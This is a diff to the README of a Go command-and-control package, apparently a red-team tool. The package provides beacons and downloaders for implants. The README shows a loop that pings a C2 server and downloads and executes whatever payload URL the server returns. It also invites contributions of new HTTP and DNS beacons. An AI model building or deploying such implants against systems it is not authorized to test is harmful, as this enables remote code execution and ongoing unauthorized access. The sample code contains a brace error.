averagesecurityguy/c2/README.md

 # C2
 The C2 package provides beacons and downloaders that can be used in implants.
 The beacons and downloaders are designed to work together but can be used separately.

-## Usage
-To use the C2 package, first, import the beacon and/or downloader package.
-Next, create a new beacon, which will ping the given C2 server.
-When the server is ready to activate the beacon it should respond with the URL of the file that should be downloaded and executed.
-If desired, create a new downloader, which takes a URL and download and executes file at the URL.
+The code below shows a sample work flow.
+You can find more detailed examples in the examples directory.

+    beacon := beacon.NewBeacon()
+    downloader := downloader.NewDownloader()

+    for {
+        str := beacon.Ping()

+        if str != ""
+            downloader.DownloadExec(str)
+        }

+        time.Sleep(sleep * time.Second)
+    }

+Each beacon must define a Ping() method, which returns a string that tells the DownloadExec() where to find the payload.
+If the Ping() method returns an empty string then DownloadExec() is not called.

-## Examples
+## Creating Implants
-Check the examples folder for detailed examples, including an HTTP server that can be used for testing the examples.
+The examples folder has two implants to use as a reference for building your own implants.
+The general idea is to select a beacon and a downloader and wrap them in a loop with some type of timing mechanism to control how often the implant will ping out.

-## Custom Beacons and Downloaders
+## Creating Beacons and Downloaders
-You can create your own beacons and downloaders by creating a struct that satisfies the appropriate interface.
+To create new beacons and downloaders you must build a struct that satisfies the appropriate interface.
+The beacon and downloader directories contain both HTTP and DNS based examples.

+## Testing
+The examples directory contains a DNS server and an HTTP server that can be used to test the various beacons and downloaders.
+There is also a test file in the beacon and downloader directories that can be used with the `go test` command to test the current beacons and downloaders.

+## Contributions
+I would love to have folks submit new beacons and downloaders.
+If you submit a new beacon or downloader also submit code or a written procedure that can be used to test the new method.